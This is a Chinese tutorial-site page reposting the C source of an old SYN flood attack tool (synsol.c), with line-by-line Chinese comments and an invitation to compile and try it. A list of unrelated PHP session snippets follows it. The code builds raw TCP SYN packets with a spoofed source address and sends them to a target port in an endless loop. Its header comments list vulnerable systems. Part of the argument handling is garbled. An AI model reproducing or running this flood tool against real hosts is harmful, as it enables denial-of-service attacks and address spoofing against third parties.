一个SYN攻击的代码分析--Used Gcc/RedHat Linux 9.0编译

首頁

後端開發

php教程

一个SYN攻击的代码分析--Used Gcc/RedHat Linux 9.0编译_PHP教程

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jul 13, 2016 pm 05:27 PM

gcclinuxredhat程式碼分析攻擊的編譯

Linux时代这是一个LINUX/UNIX的时代，你还在为自己懂一点点的 Java development..这是一个SYN攻击的源程序：大家试着读一读，看是否能读懂，不懂可以给我留言E-MAIL：QIYU155·126。COM。我加的有中文注释！
这是一个SYN攻击的源程序：大家试着读一读，看是否能读懂，不懂可以给我留言。我加的有中文注释。 /*　Syn　Attack　against　a　port　for　Solaris　*/ /*　Original　land　attack,　land.c　by　m3lt,　FLC　*/ /*　Ported　to　44BSD　by　blast　and　jerm　*/ /*　Ported　to　Solaris　by　ziro　antagonist　*/ /*　Referenced　flood.c　by　unknown　author　*/ /*　Converted　into　a　syn　attack　against　one　port　by　CRG　*/ /*　Please　use　this　for　educational　purposes　only　*/ /*　Compiles　on　Solaris　gcc　-o　synsol　synsol.c　-lsocket　-lnsl　*/ /*　Additional　notes:　*/ /*　Successfully　compiled　on　Solaris　2.51　and　2.6　*/ /*　Runs:　synsol　　　　*/ /*　*/ /*　Tested　it　on:　Solaris　2.6　*/ /*　*/ /*　Attacked　against:　*/ /*　Linux　2.0.33　-　vulnerable　*/ /*　Linux　2.0.30　-　vulnerable　*/ /*　Linux　1.2.13　-　vulnerable　*/ /*　Solaris　2.4　-　vulnerable　*/ /*　Solaris　2.5.1　-　vulnerable　*/ /*　SunOS　4.1.3_U3　-　vulnerable　*/ /*　Solaris　2.6　-　not　vulnerable　*/ /*　*/ /*　Most　of　these　test　machines　are　not　patched　because　they　*/ /*　are　in　test　lab.　I　tested　the　program　against　port　23　and　*/ /*　every　once　in　awhile　I　did　get　through.　*/ /*　*/ /*　Direct　any　comments,　questions,　improvements　to　*/ /*　packetstorm@genocide2600.com　*/ /*　http://www.genocide2600.com/~tattooman/　*/ /*　Your　emails　will　be　forwarded　to　the　author,　who　wishes　*/ /*　to　remain　known　only　as　CRG　(no　email　addy　or　URL)　*/ /*jjgirl:上面的注释的不用说了！*/ #include　 #include　 #include　 #include　 #include　 #include　 #include　 #include　 #include　 #include　 #include　 #include　 #include　 #include　 #include　 #include　 /*jjgirl:上面是头文件！*/ 　 unsigned　long　srcport; 　 struct　pseudohdr { struct　in_addr　saddr; struct　in_addr　daddr; u_char　zero; u_char　protocol; u_short　length; struct　tcphdr　tcpheader; }; /*jjgirl:定义一个伪装地址的结构！*/ 　 u_short　checksum(u_short　*　data,u_short　length) { int　nleft　=　length; int　sum=0; unsigned　short　*w　=　data; unsigned　short　value　=　0; 　 while　(nleft　>　1)　{ sum　+=　*w++; nleft　-=　2; } 　 if　(nleft　==　1)　{ *(unsigned　char　*)　(&value)　=　*(unsigned　char　*)　w; sum　+=　value; } sum　=　(sum　>>16)　+　(sum　&　0xffff); sum　+=　(sum　>>　16); value　=　~sum; return(value); } /*jjgirl:上面校验文件！包头是需要校验的，CRC校验！*/ 　　 int　main(int　argc,char　*　*　argv) {/*jjgirl:主程序开始了！*/ struct　sockaddr_in　sin; struct　sockaddr_in　din; struct　hostent　*　hoste; struct　hostent　*　host1; int　j,sock,foo,　flooddot=1; char　buffer[40]; struct　ip　*　ipheader=(struct　ip　*)　buffer; struct　tcphdr　*　tcpheader=(struct　tcphdr　*)　(buffer+sizeof(struct　ip)); struct　pseudohdr　pseudoheader; /*jjgirl:上面定义变量！*/ 　 fprintf(stderr,"Syn　attack　against　one　port.(Infinite) "); 　 if(argch_addr,&din.sin_addr,host1->h_length); else　if((din.sin_addr.s_addr=inet_addr(argv[3]))==-1) { fprintf(stderr,"unknown　source　host　%s ",argv[3]); return(-1); } if((hoste=gethostbyname(argv[1]))!=NULL) bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length); else　if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1) { fprintf(stderr,"unknown　destination　host　%s ",argv[1]); return(-1); } 　 if((sin.sin_port=htons(atoi(argv[2])))==0) { fprintf(stderr,"unknown　port　%s ",argv[2]); return(-1); } /*jjgirl:上面是给sockaddr_in结构赋值，需要指明协议，端口号！*/ 　　　 if((sock=socket(AF_INET,SOCK_RAW,255))==-1) { fprintf(stderr,"couldnt　allocate　raw　socket "); return(-1); } /*jjgirl:上面开始Socket了！*/ 　 foo=1; if(setsockopt(sock,0,IP_HDRINCL,(char　*)&foo,sizeof(int))==-1) { fprintf(stderr,"couldnt　set　raw　header　on　socket "); return(-1); } /*jjgirl:上面是为了重构报头！*/ 　 for(j=1;j>0;j++) { bzero(&buffer,sizeof(struct　ip)+sizeof(struct　tcphdr)); ipheader->ip_v=4; ipheader->ip_tos=0; ipheader->ip_hl=sizeof(struct　ip)/4; ipheader->ip_len=sizeof(struct　ip)+sizeof(struct　tcphdr); ipheader->ip_id=htons(random()); ipheader->ip_ttl=30;　/*255;*/ ipheader->ip_p=IPPROTO_TCP; ipheader->ip_sum=0; ipheader->ip_src=din.sin_addr; ipheader->ip_dst=sin.sin_addr; 　 tcpheader->th_sport=htons(srcport);　/*sin.sin_port;*/ tcpheader->th_dport=sin.sin_port; tcpheader->th_seq=htonl(0x28374839); tcpheader->th_flags=TH_SYN; tcpheader->th_off=sizeof(struct　tcphdr)/4; tcpheader->th_win=htons(2048); tcpheader->th_sum=0; 　 bzero(&pseudoheader,12+sizeof(struct　tcphdr)); pseudoheader.saddr.s_addr=din.sin_addr.s_addr; pseudoheader.daddr.s_addr=sin.sin_addr.s_addr; pseudoheader.protocol=6; pseudoheader.length=htons(sizeof(struct　tcphdr)); bcopy((char　*)　tcpheader,(char　*)　&pseudoheader.tcpheader,sizeof(struct　tcphdr)); tcpheader->th_sum=checksum((u_short　*)　&pseudoheader,12+sizeof(struct　tcphdr)); /*jjgirl:上面是重构报头！*/ 　 srcport=　(10000.0*random()/(15000+1.0)); /*jjgirl:端口当然要变！*/ 　 if(sendto(sock,buffer,sizeof(struct　ip)+sizeof(struct　tcphdr),0,(struct　sockaddr　*)　&sin,sizeof(struct　sockaddr_in))==-1) /*jjgirl:攻击开始！*/ { fprintf(stderr,"couldnt　send　packet,%d ",errno); return(-1); } usleep(2); if　(!(flooddot　=　(flooddot+1)%(1))) 　 /*jjgirl:显示次数！　Jjgirl　把上面一句,改为如下两句,增加显示效果,随你的便！ int　k=j;　if((k%10)==0)　printf(" ");　*/ 　 }　/*The　end　of　the　infinite　loop*/ close(sock); return(0); } /*jjgirl:结束！编译试试吧！如果有看不懂可以给我留言,或E-MAIL:qiyu155@126.com！*/

陳述

本文內容由網友自願投稿，版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容，請聯絡admin@php.cn

簡單地說明PHP會話的概念。Apr 26, 2025 am 12:09 AM

phpsessionstrackuserdataacrossmultiplepagerequestsusingauniqueIdStoredInAcookie.here'showtomanageThemeffectionaly：1）startAsessionWithSessionWwithSession_start（）和stordoredAtain $ _session.2）

您如何循環中存儲在PHP會話中的所有值？Apr 26, 2025 am 12:06 AM

在PHP中，遍歷會話數據可以通過以下步驟實現：1.使用session_start()啟動會話。 2.通過foreach循環遍歷$_SESSION數組中的所有鍵值對。 3.處理複雜數據結構時，使用is_array()或is_object()函數，並用print_r()輸出詳細信息。 4.優化遍歷時，可採用分頁處理，避免一次性處理大量數據。這將幫助你在實際項目中更有效地管理和使用PHP會話數據。

說明如何使用會話進行用戶身份驗證。Apr 26, 2025 am 12:04 AM

會話通過服務器端的狀態管理機制實現用戶認證。 1)會話創建並生成唯一ID，2)ID通過cookies傳遞，3)服務器存儲並通過ID訪問會話數據，4)實現用戶認證和狀態管理，提升應用安全性和用戶體驗。

舉一個如何在PHP會話中存儲用戶名的示例。Apr 26, 2025 am 12:03 AM

Tostoreauser'snameinaPHPsession,startthesessionwithsession_start(),thenassignthenameto$_SESSION['username'].1)Usesession_start()toinitializethesession.2)Assigntheuser'snameto$_SESSION['username'].Thisallowsyoutoaccessthenameacrossmultiplepages,enhanc

哪些常見問題會導致PHP會話失敗？Apr 25, 2025 am 12:16 AM

PHPSession失效的原因包括配置錯誤、Cookie問題和Session過期。 1.配置錯誤：檢查並設置正確的session.save_path。 2.Cookie問題：確保Cookie設置正確。 3.Session過期：調整session.gc_maxlifetime值以延長會話時間。

您如何在PHP中調試與會話相關的問題？Apr 25, 2025 am 12:12 AM

在PHP中調試會話問題的方法包括：1.檢查會話是否正確啟動；2.驗證會話ID的傳遞；3.檢查會話數據的存儲和讀取；4.查看服務器配置。通過輸出會話ID和數據、查看會話文件內容等方法，可以有效診斷和解決會話相關的問題。

如果session_start（）被多次調用會發生什麼？Apr 25, 2025 am 12:06 AM

多次調用session_start()會導致警告信息和可能的數據覆蓋。 1)PHP會發出警告，提示session已啟動。 2)可能導致session數據意外覆蓋。 3)使用session_status()檢查session狀態，避免重複調用。

您如何在PHP中配置會話壽命？Apr 25, 2025 am 12:05 AM

在PHP中配置會話生命週期可以通過設置session.gc_maxlifetime和session.cookie_lifetime來實現。 1)session.gc_maxlifetime控制服務器端會話數據的存活時間，2)session.cookie_lifetime控制客戶端cookie的生命週期，設置為0時cookie在瀏覽器關閉時過期。

See all articles